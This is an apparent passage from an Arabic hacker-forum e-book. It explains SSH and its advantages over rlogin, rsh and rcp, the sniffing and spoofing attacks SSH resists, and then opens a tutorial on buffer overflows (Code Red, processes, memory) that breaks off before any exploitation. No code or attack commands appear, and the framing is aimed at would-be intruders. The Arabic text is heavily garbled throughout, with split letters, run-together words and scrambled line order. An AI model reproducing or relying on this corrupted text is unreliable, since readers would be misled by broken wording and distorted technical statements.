‫ﻗﻲاﻟﻤﻮا‬
‫ﺘﺮ‬‫ﺘﺒ ﺮ ﻫﺎﻣﺔ ﺟﺪاﺑﺎﻟﻨﺴﺒﺔﻟﻤﺨ‬
‫ﺘﺒ ﺮأداة ‪ secure shell‬ﻣﻦأﻫﻢاﻻدوا تﻓﻰاﻟﺸﺒﻜﺎ ت وﺗﻌ‬ ‫ﺗﻌ‬
‫ﺘﺼﺎر‪SSh ::‬‬ ‫ﺘ ﺮﻧ ﺖ وﻏﺎﻟﺒﺎ ﻣﺎ ﻧﺠﺪﻫﺎﺑﻬﺬااﻻ ﺧ‬
‫ﺘﺨﺪﻣﻬﺎ ﻣﻌﻈﻢاﻟﺴﯿ ﺮﻓ ﺮا ت ﻋﻠﻰاﻻﻧ‬
‫ﺗﺴ‬

‫ـ ‪ SSh‬؟‬ ‫ـ‬‫ﻣﺎ ﻫﻰاﻟ‬


‫==============‬
‫ﺘﻨﻔﯿﺬ‬
‫ﺎ ل ‪ secure shell‬ﻫﻰاداه )ﺑ ﺮﻧﺎﻣ ﺞ(ﻟﻼﺗﺼﺎ ل واﻟﺪ ﺧﻮ لاﻟﻰﻛﻤﺒﯿﻮﺗ ﺮاو ﺟﻬﺎزا ﺧ ﺮ ﻋﻠﻰاﻟﺸﺒﻜﺔ ﻟ‬
‫ﺘﺨﺪم‬‫اواﻣ ﺮاو ﻣﻬﺎم ﻣﻌﯿﻨﻪ دا ﺧ ﻞ ﻫﺬااﻟﺠﻬﺎزﺑﻤﻌﻨﻰاﻻﺗﺼﺎ ل ﻋﻦﺑﻌﺪ ‪ remotely connection‬ﻮﺗﺴ‬
‫ﺛﯿ ﻖﻗﻮى واﺗﺼﺎ لاﻣﻦ ﺟﺪااﻓﻰﻗﻨﻮا تاﻻﺗﺼﺎ ل‬ ‫اﯾ ﻀﺎﻓﻰ ﻧﻘ ﻞاﻟﻤﻠﻔﺎ ت ﻣﻦﻛﻤﺒﯿﻮﺗ ﺮ ﺎﻟﻰا ﺧ ﺮ و ﻫﻰﺗﻘﺪمﺗﻮ‬
‫ﺘﻌﻤ ﻞﻟﻨﻔ ﺲاﻟﻐ ﺮ ضﻓﻰ ﯾﻮﻧﻜ ﺲ ﻣﺜ ﻞ ‪(rlogin,rsh and‬‬ ‫ﺘﺒ ﺮﻛﺒﺪﯾ ﻞ ﺟﯿﺪ ﺟﺪااﻻدوا تﺗﺴ‬
‫اﻟﻐﯿ ﺮاﻣﻨﻪ وﻫﻰﺗﻌ‬
‫‪rcp).‬‬
‫ﻮﺗﻘﺪماﯾ ﻀﺎا ل ‪ secure shell‬ﺎﺗﺼﺎ لاﻣﻦ ﺟﺪااﻟﺸ ﺤﻨﺎ تاﺗﺼﺎﻻ تا ل ‪tcp‬ﻛﻮﻧﯿﻜﺸﻦ ‪.‬‬

‫ﻮ ﻫﻨﺎ ﯾﺄﺗﻰ ﺳﺆا ل ﻣﻬﻢ ‪ ::‬واﻟﺴﺆا ل ﻫﻮ ‪::‬‬

‫ﺘﻰ ﯾﻄﻠ ﻖ ﻋﻠﯿﻬﺎ ‪r- commands‬ﻓﻰ‬ ‫ﺘﺨﺪاما ل ‪ secure shell‬ﻋﻠﻰاﻻدوا تاﻻ ﺧ ﺮىاﻟ‬ ‫ﻟﻤﺎذا ﯾﻔ ﻀ ﻞ ﺎﺳ‬
‫ﯾﻮﻧﻜ ﺲ ﻛﺎﻟﻤﺬﻛﻮرﯾﻦﻓﻰاﻻﻋﻠﻰ ؟‬
‫======================‬
‫ﺘﻰ ﯾﻄﻠ ﻖ ﻋﻠﯿﻬﺎ ‪ r- commands‬ﻣﺜ ﻞ‬ ‫ﺘﻌ ﺮ ض ﺎﻻدوا تاﻟ‬ ‫ﻓﻰﺗﻮزﯾﻌﺎ تاﻟﯿﻮﻧﻜ ﺲ ﻣﺜ ﻞا ل ‪*BSD‬ﺗ‬
‫ﺘﺴﺐا ل‬ ‫ﺘﻄﺎ عان ﯾﻜ‬‫ﺘﻠﻔﻪ ﻣﻦ ﺎﻟﻬﺠﻤﺎ ت ﺣﯿﺚاﻧﻪﻟﻮ ﺷﺨ ﺺاﺳ‬ ‫)‪(rlogin,rsh and rcp‬ﺎﻟﻰاﻧﻮا ع ﻣﺨ‬
‫ﺘﻰ ﻋﻠﻰاﻟﺸﺒﻜﻪﺑﻄ ﺮﯾﻘﻪ ﻣﺎاوﻓﻌﻠﻬﺎ ن ﻃ ﺮﯾ ﻖاﺗﺼﺎ لﻓﯿﺰﯾﺎﺋﻰ‬ ‫رو تاﻛﺴﯿ ﺲ )‪(root access‬ﻟﻼﺟﻬﺰهاﻟ‬
‫ﺘﻄﯿﻊ‬ ‫ﺘﻰ ﻋﻠﻰاﻟﺸﺒﻜﻪﺑﺪونادﻧﻰ ﺻﻌﻮﺑﻪ ﻻﻧﻪ ﯾﺴ‬ ‫اى رﯾﻤﻮﺗﻠﻰ ﯾﻤﻜﻨﻪان ﯾﺪ ﺧ ﻞاﻟﻰﻛ ﻞﺑﯿﺎﻧﺎ تاﻻﺟﻬﺰهاﻟ‬
‫ﺑﺎﻟ ﺮو تاﻛﺴ ﺲان ﯾﻌﺒ ﺮ ﻣﻦ ﺧﻼ لاىاداه ﻣﻦاﻟﻤﺬﻛﻮرهﻓﻰ ﯾﻮﻧﻜ ﺲﺑﺪوناى ﺻﻌﻮﺑﻪ و ﯾﻤﻜﻨﻪﺗﻔﺎدﯾﻬﺎﺑﻄ ﺮ ق‬
‫ﺘﻘﺪاﻧﻜﻢ‬ ‫ﻣﻌﯿﻨﻪ و ﻫﺬا ﻣﺎ ﯾﺴﻤﻰﺑﺄناﻟﺸﺨ ﺺﻟﺪﯾﻪ ‪ unauthorized access to systems‬ﺎﻋ‬
‫ﺘﻘﻂﻛ ﻞاﻟﺒﺎﻛﯿﺪﺟ ﺲ ﻣﻦ ﺧﻼ ل‬ ‫ﻗﺐ اﻟﻨ ﺖ وركﺗ ﺮاﻓﯿﻚ و ﯾﻠ‬ ‫ﺘﻮﻧﻰاﻻن ﻮ ﯾﻤﻜﻦاﯾ ﻀﺎ ﻻى ﺷﺨ ﺺان ﯾ ﺮا‬ ‫ﻓﻬﻤ‬
‫ﺘﻚ‪.‬‬ ‫ﺘﻢﻟ ﺸﺒﻜ‬ ‫ﺘﻮى ﻋﻠﻰاﻟﺒﺎﺳﻮردسﻟﻠﺴﯿﺴ‬ ‫ﺘﻚ وﺗﻜﻮن ﻫﺬهاﻟﺒﺎﻛﯿﺪﺟ ﺲﺗ ﺤ‬ ‫ﺷﺒﻜ‬
‫ﺘ ﺮا قاﻟﻤﻨﻈﻤﺎ ت‬ ‫ﺘﺨﺪمﻓﻰا ﺧ‬ ‫ﺘ ﺮا ق وﺗﺴ‬ ‫ﻗﺒﻪاﻟﻨ ﺖ وركﺗ ﺮاﻓﯿﻚﻫﻰ ﻃ ﺮﯾﻘﻪ ﺣﻘﯿﻘﯿﻪﻓﻰاﻻ ﺧ‬ ‫ﻣﻠ ﺤﻮﻇﻪ‪ :‬ﻃ ﺮﯾﻘﻪ ﻣ ﺮا‬
‫ﺘ ﺮا ق ( ‪.‬‬
‫ﺛ ﺮ واﻻﻋﺪادﻟﻼ ﺧ‬ ‫ﺎﻟﻜﺒ ﺮى وﺗﻘﻊﺗ ﺤ ﺖﺑﻨﺪﺗﻘﻔﻰاﻻ‬
‫ﻮاﻻن ﻧﻌﻮداﻟﻰاﻟﺴﯿﻜﯿﻮر ﺷﯿ ﻞ و ﻣﺰاﯾﺎاﻟﺴﯿﻜﯿﻮر ﺷﯿ ﻞﺗﻈﻬ ﺮ ﻫﻨﺎ ﻣﻊﻛ ﻞ ﻋﯿﻮباﻻدوا تﻓﻰ ﯾﻮﻧﻜ ﺲ‬
‫ﺛﻮ ق ﻋﺒ ﺮهاى ﻻ ﯾﻌﻄﯿﻪ‬ ‫ﺘﺼ ﻞاﺗﺼﺎ ل ﻣﻮ‬ ‫ﻓﺎﻟﺴﯿﻜﯿﻮر ﺷﯿ ﻞ ﯾﻄﺎﻟﺐاﻟﺸﺨ ﺺاﻟﺬىﻟﺪﯾﻪاﻟ ﺮو تاﻛﺴ ﺲاﯾ ﻀﺎﺑﺄن ﯾ‬
‫ﺘ ﺤﺎﯾ ﻞ ﻋﻠﻰا ل ‪ssh‬ﻓﻰﻫﺬهاﻟﻨﻘﻄﻪ و‬ ‫اﻟ ﺤ ﻖﻟﻠﺪ ﺧﻮ لاﻟﻰﺑﯿﺎﻧﺎ تاﺟﻬﺰهاﻟﺸﺒﻜﻪاﻻﺑﺎﻟﺒﺎﺳﻮرد و ﻻ ﯾﻤﻜﻦاﻟ‬
‫ﺘﻄﺴﻊاﻻ ﻃﻼ ع ﻋﻠﻰﺑﯿﺎﻧﺎ تاﻟﺸﺒﻜﻪ ﺎﻻ ﺐ‬ ‫ﺘﺴﺎباﻟ ﺮو تاﻛﺴ ﺲﻟﻦ ﯾﺴ‬ ‫ﺘﻰﻟﻮﺗﻤﻜﻦاﻟﺸﺨ ﺺ ﻣﻦاﻛ‬ ‫ﺑﺬﻟﻚ ﺣ‬
‫‪authorized access to systems .‬‬
‫ﺘﻘﺎط‬ ‫ﺘﻚ واﻟ‬ ‫ﻗﺒﻪاﻟﻨ ﺖ ورركﺗ ﺮاﻓﯿﻚﻟﺸﺒﻜ‬ ‫ﻗﻚ ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣ ﺮا‬ ‫ﺘ ﺮا‬
‫ﻮاﻟﻨﻘﻄﻪاﻟﺜﺎﻧﯿﻪﻫﻰاناذا ﺣﺎو لا ﺣﺪ ﺎ ﺧ‬
‫ﺘﻰﺗ ﺤﻤ ﻞ ﻣﻌﻠﻮﻣﺎﺗﻚ وﺑﺎﺳﻮرداﺗﻚﻓﺴﯿﺨﯿﺐاﻣﻠﻪ ﻻناﻟﺴﯿﻜﯿﻮر ﺷﯿ ﻞ ﻻ ﯾ ﺮﺳ ﻞاﻟﺒﺎﺳﻮردا تﻓﻰ‬ ‫اﻟﺒﺎﻛﯿﺪﺟ ﺲاﻟ‬
‫ﺘﺮ ق‬ ‫ﺻﻮره وا ﺿ ﺤﻪﻛﻤﺎﺗ ﺮﺳﻠﻬﺎادوا ت ﯾﻮﻧﻜ ﺲاﻻ ﺧ ﺮى وﻟﻜﻦ ﯾ ﺮﺳﻠﻬﺎ ﻣﺸﻔ ﺮه وﻟﺬﻟﻚ ﺳﯿﻜﻮن ﻋﻠﻰاﻟﻤﺨ‬

‫‪٣٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻣ ﺤﺎوﻟﻪﻓﻚاﻟﺸﻔ ﺮه واﻟ ﺦ‬
‫ﺘﺒ ﺮﺛﻐ ﺮاﺗﻪﻗﻠﯿﻠﺔ وﺗﻘ ﺮﯾﺒﺎ‬
‫ﻮﻟﻜﻦ ﻣﻊﻛ ﻞ ﻫﺬهاﻟﻤﺰاﯾﺎﻟﻢ ﯾﺨﻠﻰا ل ‪ secure shell‬ﻣﻦاﻟﺜﻐ ﺮا ت وﻟﻜﻦﺗﻌ‬
‫ﺘ ﺮ قاﻟﺴﯿﻜﯿﻮر ﺷ ﻞﻓﻘﻂﺑﻬﺎ )ﻫﺬاﻛﻼمﺑﯿﻨﻰ وﺑﯿﻨﻜﻢ‬ ‫ﺘﺎجاﻟﻰاﻟ ﺮوو تاﻛﺴ ﺲ واﻻ ﺧ ﺮى ﯾﻤﻜﻦانﺗﺨ‬ ‫ﻣﻌﻈﻤﻬﺎ ﯾ ﺤ‬
‫(‬

‫ﻮاﻻن ﺳﺆا لا ﺧ ﺮ ‪::‬‬

‫ﺘﻰﺗ ﺤﻤﻰ ﻣﻨﻬﺎا ل ‪ ssh‬؟‬ ‫ﻣﺎ ﻫﻰاﻧﻮا عاﻟﻬﺠﻮماﻟ‬


‫==========================‬
‫ﺘ ﺤﺎ ل ﻋﻨﻮاﯾﻦاﻻ ىﺑﻰ ﺣﯿﺚاﻧﻪﻟﻮارﺳ ﻞ ﺷﺨ ﺺ ﻣﺎ‬ ‫‪-١‬ﺗ ﺤﻤﻰ ﻣﻦا ل ‪ ip spoofing‬ﺎىﺗ ﺤﻤﻰ ﻣﻦاﻧ‬
‫ﺛﻮ قﺑﻪ ﯾﻜﺸﻔﻪا ل ‪ ssh‬ﻮﺗ ﺤﻤﻰاﯾ ﻀﺎ‬ ‫ﺛﻮ قﺑﻪ وﻟﻜﻨﻪﻓﻰاﻟ ﺤﻘﯿﻘﻪﻟﯿ ﺲ ﻣﻮ‬ ‫ﺑﺎﻛﯿﺪﺟ ﺲ ﻣﻦاىﺑﻰ ﯾﻈﻬ ﺮاﻧﻪ ﻣﻮ‬
‫ﺘ ﺤﻠﯿﻦ ﻋﻠﻰاﻟﺸﺒﻜﻪاﻟﻤ ﺤﻠﯿﻪاى‪. localy .‬‬ ‫ا ل ‪ ssh‬ﻣﻦ ﺎﻟﻤﻨ‬
‫‪-٢‬ﺗ ﺤﻤﻰ ﻣﻤﺎ ﯾﺴﻤﻰا ل ‪. DNS spoofing‬‬
‫ﺘﺲ‪.‬‬ ‫ﺘﻰ ﯾﻜﻮن ﻣﺨﺰن ﻋﻠﯿﻬﺎاﻟﺒﺎﺳﻮردا تاﻟﻮا ﺿ ﺤﻪ وﺑﯿﺎﻧﺎ ت ﺎﻟﻬﻮﺳ‬ ‫ﺘ ﺲاﻟ‬ ‫ﺘﯿﻜﺴ‬ ‫ﺘ ﺮ ض ﻇﻬﻮراﻟ‬ ‫‪-٣‬ﺗﻌ‬
‫ﺛﻮ قﺑﻪ ﻣﻦ ﻋﻤ ﻞاﯾﺪﯾ ﺖﻻى داﺗﺎ ﻣﺨﺰﻧﻪ‬ ‫‪-٤‬ﺗ ﺤﻤﯿﻚ ﻣﻦ ﻣﻌﺎﻟﺠﻪاﻟﺒﯿﺎﻧﺎ تاﻟﻤﺨﺰﻧﻪاىﺗﻤﻨﻊاى ﺷﺨ ﺺ ﻏﯿ ﺮ ﻣﻮ‬
‫‪.‬‬
‫وﻟﻜﻦ ﻣﻊﻛ ﻞ ﻫﺬاﻓﺄنا ل ‪ssh‬ﻟﯿ ﺲاﻣﻦﺑﺪرﺟﻪﻛﺒﯿ ﺮه ﺣﯿﺚاناﻻﺷﺨﺎ ص ذو ﺧﺒ ﺮهﻛﺒﯿ ﺮهﻓﻰاﻟﻨ ﺖ ورك‬
‫ﺘﻄﯿﻌﻮنان ﯾﺠﻌﻠﻮنا ل ‪ ssh‬ﯾﻨﻘﻄﻊ ﻋﻦاﻻﺗﺼﺎ لاى ‪ disconnected‬ﻮﻟﻜﻦ ﻻ ﯾﻤﻜﻦان ﯾﻜﺴ ﺮو‬ ‫ﯾﺴ‬
‫ﺘ ﺮاﻓﯿﻚاﻟﺬىﻛﺎن ﯾﻨﻘﻠﻬﺎ ‪.‬‬ ‫ﺗﺸﻔﯿ ﺮﺑﯿﺎﻧﺎﺗﻪاو ﯾﻌﯿﺪواﺗﺸﻐﯿ ﻞ ﺎﻟ‬
‫ﺘﻰﺗﺴﻤﺢ‬ ‫ﺘﺸﻔﯿ ﺮاﻟ‬
‫ﺘﺨﺪم ﺧﺎ ﺻﯿﻪاﻟ‬ ‫ﺘﻰﺗﻜﻠﻤﻨﺎ ﻋﻨﻬﺎﺑﻸﻋﻠﻰ ﺳﻮ فﺗﻌﻤ ﻞﻓﻘﻂاذاﻛﻨ ﺖﺗﺴ‬ ‫ﻮاﯾ ﻀﺎﻛ ﻞاﻻﺷﯿﺎ ءاﻟ‬
‫ﻟﻚﺑﻬﺎا ل ‪ ssh‬ﻮ ﻫﻰﺗﺴﻤﺢﺑﺄﻛﺜ ﺮ ﻣﻦ ﻧﻮ عﺗﺸﻔﯿ ﺮ ﻣﺜ ﻞ‪(three-key triple-DES, DES, RC4-‬‬
‫ﺘﺨﺪام ﻣﺎﺗ ﺮﯾﺪ ﻣﻨﻬﻢ واﯾ ﻀﺎ ﻫﻨﺎكاوﺑﺸﻦاى ﺧﯿﺎرﻓﻰاﻻداهﺗﺴﻤﺢ‬ ‫)‪128, TSS, Blowfish‬ﯾﻤﻜﻨﻚاﺳ‬
‫ﻗﻮ ل ﻋﻠﯿﻚا ﺣﻤ ﻖ ! ﻻن‬ ‫ﺘﺸﻔﯿ ﺮاى" ‪ encryption of type "none‬ﻮﺑﻬﺬاﺗﺠﻌﻠﻨﻰا‬ ‫ﻟﻚﺑﻌﺪمﺗﺸﻐﯿ ﻞاﻟ‬
‫ﺘﻰﺗﻢ ذﻛ ﺮﻫﺎﻓﻰاو لاﻟﻤﻮ ﺿﻮ عﻓﻰ ﯾﻮﻧﻜ ﺲ ‪ ،‬ﺣﯿﺚانﻫﺬا‬ ‫ﺘ ﺮا ق ﻣﺜ ﻞاﻻدوا تاﻟ‬‫ﻫﺬا ﯾﺠﻌ ﻞا ل ‪ ssh‬ﺳﻬﻠﻪ ﺎﻻ ﺧ‬
‫ﺘﺸﻔﯿ ﺮ ﺎﯾ ﻀﺎ ﯾﻤﻨﻊا ل ‪ ip spoofing‬ﻮا ل ‪ DNS spoofing‬ﻮ ﻫﺬااﯾ ﻀﺎﺑﺎﻻ ﺿﺎﻓﻪاﻟﻰﺗﻐﯿﯿ ﺮ ﻣﻔﺎﺗﯿﺢ‬ ‫اﻟ‬
‫ﺘﻌﻤﺎﻟﻬﺎﺗﻤﺎﻣﺎ‪.‬‬‫ﺘﻰﺗﻢاﺳ‬ ‫ﺘﺪﻣﯿ ﺮاﻟ‬‫ﺘﻢﺗﺪﻣﯿ ﺮ ﻣﻔﺎﺗﯿﺢاﻟ‬ ‫ﺘ ﺮه ﻣﻌﯿﻨﻪ و ﯾ‬ ‫ﺘﺸﻔﯿ ﺮﻛ ﻞﻓ‬‫ﻓﻚاﻟ‬
‫ﺘﻤﺎم ﻣﻊاﻧﻬﺎ ﻻﺗﺨﻠﻮ ﻣﻦ ﺎﻟﺜﻐ ﺮا ت وﻟﻜﻦﻟﻨﺠﻌﻠﻬﺎاﻓ ﻀ ﻞ‬ ‫ﺘ ﺮام واﻻﻫ‬‫ﺘ ﺤ ﻖاﻻ ﺣ‬ ‫ﺎذنﻓﻬﻰاداه ﺣﻘﺎ ﻣﻤﯿﺰه وﺗﺴ‬
‫اﻟ ﻤﻮﺟﻮد ﺣﺎﻟﯿﺎﻓﻰ ﻫﺬااﻟﻤﺠﺎ ل‪...‬‬

‫‪٣٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﺷﺮح ﻣﻌﲎ اﻟـ ‪" Buffer Overflows‬‬

‫‪$$$$$$$$$$‬‬
‫ﺎﻟﻜﺎﺗﺐ‪Lamer :‬‬
‫‪$$$$$$$$$$‬‬

‫ﺘﺐﺑﻄ ﺮﯾﻘﺔ ﻣﺒﺴﻄﺔاﻛﺜ ﺮ ﺣﻮ لﻫﺬااﻟﻤﻮ ﺿﻮ ع‬


‫ﺘﺎﺑﺎ تﻓﻲ ﻫﺬااﻟﻤﻮ ﺿﻮ عﻟﻜﻨﻲ ﺣﺎوﻟ ﺖاناﻛ‬
‫وﺗﻮﺟﺪاﻟﻌﺪﯾﺪ ﻣﻦاﻟﻜ‬
‫ﺑﻄ ﺮﯾﻘﺔ ﯾﻔﻬﻤﻬﺎاﻟﺠﻤﯿﻊ‬
‫ـ ‪ Buffer Overflow‬؟‬ ‫‪ -١‬ﻣﺎﻫﻮاﻟ‬

‫‪ -٢‬ﺎﻟﻤﻌﺎﻟﺠﻪ)‪(Proccess‬‬

‫‪-٣‬ﺈدارةاﻟﺬاﻛ ﺮه)‪(Memory management‬‬

‫ـ‪Buffer Overflow‬‬
‫ﺘﻐﻼ ل ﻣﺎذﻛ ﺮﻓﻲ ﺎﻟ‬
‫‪-٤‬اﺳ‬

‫ﺘﻄﯿﻊ‬
‫ﻗﻮﺗﻬﺎﻟﯿﺴ‬
‫ﺘﻌﻠﻢﻛ ﻞ ﻣﻬﻢﻓﻲاﻟﺒ ﺮاﻣ ﺞ وادارةاﻟﺬاﻛ ﺮة وﻣﻮا ﻃﻦ ﺿﻌﻔﻬﺎ و‬
‫ﺘ ﺮ قان ﯾ‬‫*ﯾﺠﺐ ﻋﻠﻰﻛ ﻞ ﻣﺨ‬
‫ﺘ ﺤﺎﯾ ﻞ ﻋﻠﯿﻬﺎ وﻣﻦﻫﺬااﻟﻤﻨﻄﺒ ﻖﻛﺎن ﻫﺬااﻟﻤﻘﺎ ل ‪.....‬‬
‫ﺘﻌﺎﻣ ﻞ ﻣﻌﻬﺎ واﻟ‬
‫اﻟ‬

‫ـ‪ Buffer Overflow‬؟‬ ‫‪ -١‬ﻣﺎﻫﻮاﻟ‬


‫‪------------------------------------‬‬

‫ﺘﺔﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞ ‪.‬‬


‫‪ Buffer Overflow‬ﺣﺎﻟﺔﺗ ﺤﺪ ثﻟﺒ ﺮﻧﺎﻣ ﺞﺑﺴﺒﺐ ﺧﻠ ﻞﺑ ﺮﻣﺠﻲﻓﻲﺑ ﺮﻣﺠ‬
‫ﺘﻐﻠ ﺖ‬
‫ﺘﻲأﺳ‬ ‫ﺘﻐﻼﻟﻬﺎ ﻣﻦ ﻧﻮ ع ‪Buffer Overflow‬ﺗﺴﻤﻰﻓﺎﯾ ﺮوس ‪ 'code red' ،‬ﺎﻟ‬ ‫ﺎ ﺣﺪ ثﺛﻐ ﺮة ﯾﻤﻜﻨﻚأﺳ‬
‫ﻓﻲ ﺧﺎدم ‪IIS‬ﻟﻤﺎﯾﻜ ﺮوﺳﻮﻓ ﺖ‪-MS web server -‬‬
‫ّ ﺮﺑ ﺤﺠﻢﺛﺎﺑ ﺖ )ﻋﻠﻰ ﺳﺒﯿ ﻞاﻟﻤﺜﺎ ل‪ ،‬ﺣﺠﻢ‬ ‫ﺘﻐﯿ‬
‫ﻋﻤﻮﻣﺎ‪ ،‬ﯾ ﺤﺪ ث ‪ Buffer Overflow‬ﻋﻨﺪﻣﺎ ﯾﻈﻬ ﺮﺑ ﺮﻧﺎﻣ ﺞ ﻣﺎ ﻣ‬
‫ّ ﺮ‪.‬‬
‫ﺘﻐﯿ‬
‫ّ ﺮأﻛﺒ ﺮ ﻣﻦ ﺣﺠﻢاﻟﻤ‬ ‫ﺘﻐﯿ‬
‫ّﺼ ﺖإﻟﻰ ﻫﺬهاﻟﻤ‬
‫ﺘﻲ ﺧﺼ‬‫‪٢٠‬ﺑﺎﯾ ﺖ( واﻟﻘﯿﻤﺔاﻟ‬

‫ﺧﺬ ﻫﺬا ﺎﻟﻤﺜﺎ ل‪:‬‬


‫ﺘﺨﺪم "واﻧﺎ ﻣﺜﻼﺑ ﺮﻣﺠﺔﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞ‬‫ﯾﻈﻬ ﺮﺑ ﺮﻧﺎﻣﺠﻲ ﻋﻠﻰاﻟﺸﺎﺷﺔﻫﺬهاﻟﺠﻤﻠﺔ‪" :‬اﻟ ﺮﺟﺎ ءاد ﺧﺎ لاﺳﻢاﻟﻤﺴ‬
‫ﺘﺠﺎوزﻓﻲاﺳﻮأاﻟ ﺤﺎﻻ ت ‪ ٣٠‬ﺣ ﺮﻓﺎ ﻣﺜﻼ )‪ STRING(30‬وﺳﯿﻌﻤ ﻞ‬ ‫ﺘﺨﺪمﻟﻦ ﯾ‬ ‫ﺑ ﺤﺚ ﯾﻜﻮن ﻣﻨﻄﻘﯿﺎاناﺳﻢاﻟﻤﺴ‬
‫ﺘﻰﺗﻜﻮناﻟﻤﺸﻜﻠﺔ ‪.....‬‬ ‫اﻟﺒ ﺮﻧﺎﻣ ﺞﺑﺸﻜ ﻞ ﻃﺒﯿﻌﻲﻟﻜﻦ ﻣ‬
‫ﺘﺨﺪمﻓﺎﻟﺒﯿﺎﻧﺎ تﻫﺬهاﻟﺰاﺋﺪةﺗﻜﻮن ﻋﺒﺎرة ﻋﻦ‬‫ﺎﻟﻤﺸﻜﻠﺔ ﻫﻨﺎﺗﻜﻮناذاﺗﻢاد ﺧ ﻞ ﻣﺜﻼ ‪ ٢٠٠‬ﺣ ﺮ فﻛﺎﺳﻢﻟﻠﻤﺴ‬
‫ّ ﺮاﻻﺳﻢ‪.‬‬
‫ﺘﻐﯿ‬‫ّﺼ ﺖﻟﻤ‬‫ﺘﻲ ﺧﺼ‬‫ـ "‪" Overflow‬ﻋﻠﻰاﻟﺬاﻛ ﺮةاﻟ‬ ‫ﻃﻔ ﺤﺎن وﻫﻮ ﻣﺎ ﯾﺴﻤﻰﺑﺎﻟ‬
‫ّ ﺺاﻟﺬاﻛ ﺮة ‪:‬‬‫ﻋﻨﺪﻣﺎ ﯾﺒﺪأاﻟﺒ ﺮﻧﺎﻣ ﺞ‪،‬ﺗﺨﺼ‬

‫ّ ﻫﺬااﻟﺨﻄﺄ؟؟؟‬
‫ﺘﻐ ﻞ‬‫ﺎذنﻛﯿ ﻒأﺳ‬
‫ﺘﻌﻠ ﻖﺑﻬﺬااﻻﻣ ﺮﻓﻲﺑﻨﯿﺔاﻟ ﺤﺎﺳﺰب‪.‬‬‫ﻗﺒ ﻞأنﺗﺼ ﻞ ﻻﺟﺎﺑﺔﻋﻠﻰ ﻫﺬااﻟﺴﺆا ل ﺳﻨﺄ ﺧﺬ ﺟﻮﻟﺔ ﺣﻮ ل ﻣﺎ ﯾ‬
‫ﻗﻲ ﺎﻷﻧﻈﻤﺔ‪.‬‬
‫ﺛ ﻞﻟﺒﺎ‬
‫ﻗ ﺶ ﻧﻈﺎمﻟﯿﻨﻜ ﺲ ‪linux،‬ﻟﻜﻦاﻟﻤﻔﻬﻮم ﻣﻤﺎ‬ ‫ﻓﻲ ﻫﺬهاﻟﻤﻘﺎﻟﺔ ﺳﻨﻨﺎ‬

‫‪-٢‬اﻟﻤﻌﺎﻟﺠﻪ‪(Proccess):‬‬
‫‪---------------------------‬‬

‫‪٣٥‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ّ ﺎﻟﻮ ﺣﺪةاﻟﻮﻇﯿﻔﯿﺔاﻷﺳﺎﺳﯿﺔﻓﻲ ﺣﺎﺳﻮب ﯾﻌﻤ ﻞ ﻫﻲ ﻋﻤﻠﯿﺔاﻟﻤﻌﺎﻟﺠﻪ‪(Proccess).‬ﻓﻲاﻟ ﺤﺎﺳﻮب ﻫﻨﺎﻟﻚ‬ ‫ﺈن‬


‫ﺘﻲﺗﺠﻌ ﻞاﻟﻌﺪﯾﺪ ﻣﻦ ﺎﻟﻌﻤﻠﯿﺎ تﺗﻌﻤ ﻞﻓﻲ ﻧﻔ ﺲ‬ ‫ّةاﻟ‬
‫ﺘﺸﻐﯿ ﻞ ﻣﺴﺆو ل ﻋﻦﺗﻘﺴﯿﻢاﻟﻘﻮ‬ ‫اﻟﻌﺪﯾﺪ ﻣﻦاﻟﻌﻤﻠﯿﺎ ت وﻧﻈﺎماﻟ‬
‫ﻗ ﺖﻓﻲاﻟ ﺤﺎﺳﻮب‪.‬‬ ‫اﻟﻮ‬
‫ﱠ و ﺣﺪة‬‫؛ان‬ ‫ﺘﻌﺪداﻟﻌﻤﻠﯿﺎ ت "‪ Multi- proccesses‬ﺻ ﺤﯿﺢ‪...‬ﻛﯿ ﻒاذن؟‬ ‫ﻟﯿ ﺲﻫﻨﺎك ﺷﻲ ءإﺳﻤﻪ "ﻣ‬
‫ُ ﻋﻠﻰ ﺣﺪهﺑﺴ ﺮﻋﺔﻛﺒﯿ ﺮهﺑ ﺤﯿﺚﺗﺒﺪو ﻣﺜ ﻞاﻟﻌﺪﯾﺪ ﻣﻦاﻟﻤﻬﺎم‬ ‫ﺘﻘ ﻞﺑﯿﻦاﻟﻌﻤﻠﯿﺎ تﻛ ﻞ‬
‫اﻟﻤﻌﺎﻟﺠﺔاﻟﻤ ﺮﻛﺰﯾﺔ )‪(CPU‬ﺗﻨ‬
‫ﻗ ﺖ وا ﺣﺪ‪،‬‬
‫ﺘﻲﺗﻌﻤ ﻞﻓﻲ ﻮ‬ ‫اﻟ‬
‫ﺘﻲ ﯾﺆدﯾﻬﺎ ﻋﻠﯿﻨﺎ ‪.. (:‬‬
‫ﻗ ﺖ وا ﺣﺪ وﻫﺬه ﻣﻦ ﺧﺪ عاﻟ ﺤﺎﺳﻮباﻟ‬‫اذاﺗﺒﺪوﻟﻨﺎﻛﺄناﻟﻌﻤﻠﯿﺎ تﺗﻌﻤ ﻞﻓﻲ و‬
‫ّ ﻋﻤﻠﯿﺔﻟﻬﺎ ﻋﻨﻮانﻓﺎ ﺿﻲ ﻣﻦاﻟﺬاﻛ ﺮه ‪ ،‬وﻻﯾﻤﻜﻦﻷي ﻋﻤﻠﯿﺔآ ﺧ ﺮىﺗﺪ ﺧ ﻞﻓﻲﻫﺬااﻟﻤﻜﺎناﻟﻔﺎ ﺿﻲ ﻣﻦ‬ ‫ﻛﻞ‬
‫اﻟﺬاﻛ ﺮة‪ .‬وﻫﺬا ﯾ ﺮﺷﺪﻧﺎاﻟﻰ ﺷﻲا ﺧ ﺮ ﯾﺠﺐانﺗﻔﻬﻤﻪ وﻫﻮ‪:‬‬

‫‪-٣‬إدارةاﻟﺬاﻛ ﺮه‪(Memory management):‬‬


‫‪------------------------------------------------‬‬

‫ﺘ ﺮا ﺿﯿﺔ)‪ virtual memory‬ﻇﺎﻫ ﺮﯾﺔ(‪.‬‬


